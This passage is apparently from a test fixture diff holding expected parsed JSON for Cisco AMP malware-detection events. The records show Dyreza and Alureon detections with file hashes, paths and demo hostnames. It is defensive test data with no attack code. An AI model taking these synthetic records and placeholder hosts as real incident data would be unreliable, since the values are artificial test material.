"cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:12:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176257791640993860", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 898000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176257791640994000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 265349, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:12:25.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176257740101386307", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 901000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176257740101386000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 266668, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:12:13.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176257688561778754", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 874000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176257688561779000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 267987, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:12:02.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176257641317138497", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 236000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176257641317138000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 269306, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:11:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6533667317698527247", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 641000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667317698527000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 270625, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:11:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176257589777530944", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 224000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176257589777531000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 274588, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:11:44.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176257564007727167", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 218000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176257564007727000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 275907, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:11:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176257512468119614", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 581000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176257512468120000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 277226, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:11:20.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176257460928512061", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 569000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176257460928512000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 278545, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:11:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "c6:4e:72:6f:69:14" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "Eldorado:Alureon-tpd", + "cisco.amp.detection_id": "5825617812646789131", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "c6:4e:72:6f:69:14" + ], + "cisco.amp.timestamp_nanoseconds": 875000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 5825617812646789000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "bfcc0861c7fb965c1f7473d3dc42cff6", + "file.hash.sha1": "420da91c3199993c9f245b21ea060b69d7ecfd49", + "file.hash.sha256": "aaa33c484a7728c49009afeaea27f0f87d7bdf27a46b61e4d0030f9d66cb6f33", + "file.name": "5A.tmp", + "file.path": "\\\\?\\C:\\WINDOWS\\Temp\\5A.tmp", + "fileset.name": "amp", + "host.hostname": "Demo_TDSS", + "host.name": "Demo_TDSS", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 279864, + "process.hash.md5": "60784f891563fb1b767f70117fc2428f", + "process.hash.sha1": "e6e904b84332191d44de729deb7bfed9bcef2ce9", + "process.hash.sha256": "e0b07f08e60ffbad36c2e58180f4b2a16dca47716044cbe0213df7b74d742f1f", + "process.name": "spoolsv.exe", + "process.pid": 1480, + "related.hash": [ + "aaa33c484a7728c49009afeaea27f0f87d7bdf27a46b61e4d0030f9d66cb6f33", + "bfcc0861c7fb965c1f7473d3dc42cff6", + "420da91c3199993c9f245b21ea060b69d7ecfd49" + ], + "related.hosts": [ + "Demo_TDSS" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:11:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "c6:4e:72:6f:69:14" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "Eldorado:Alureon-tpd", + "cisco.amp.detection_id": "5825617808351821830", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "c6:4e:72:6f:69:14" + ], + "cisco.amp.timestamp_nanoseconds": 812000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 5825617808351822000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "4a052246c5551e83d2d55f80e72f03eb", + "file.hash.sha1": "bc29f1e8460915596e1dcafd0c92d6309457d149", + "file.hash.sha256": "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", + "file.name": "59.tmp", + "file.path": "\\\\?\\C:\\Documents and Settings\\admin\\Local Settings\\Temp\\59.tmp", + "fileset.name": "amp", + "host.hostname": "Demo_TDSS", + "host.name": "Demo_TDSS", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 287092, + "process.hash.sha256": "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", + "process.name": "tdss.exe", + "process.pid": 3728, + "related.hash": [ + "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", + "4a052246c5551e83d2d55f80e72f03eb", + "bc29f1e8460915596e1dcafd0c92d6309457d149" + ], + "related.hosts": [ + "Demo_TDSS" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:11:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176257409388904508", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 56000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176257413683872000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 294937, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:10:59.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "c6:4e:72:6f:69:14" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "Eldorado:Alureon-tpd", + "cisco.amp.event_type_id": 1107296272, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "c6:4e:72:6f:69:14" + ], + "cisco.amp.timestamp_nanoseconds": 267000000, + "event.action": "Executed malware", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 1489955900267000300, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-15T10:10:59.000Z", + "file.hash.sha256": "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", + "fileset.name": "amp", + "host.hostname": "Demo_TDSS", + "host.name": "Demo_TDSS", + "input.type": "log", + "log.offset": 296255, + "process.hash.sha256": "1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455", + "related.hash": [ + "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5" + ], + "related.hosts": [ + "Demo_TDSS" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:10:56.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176257357849296955", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 607000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176257357849297000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 297536, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:10:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533667064295456780", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 478000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667064295457000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 298855, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:10:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176257340669427770", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 988000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176257340669428000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": 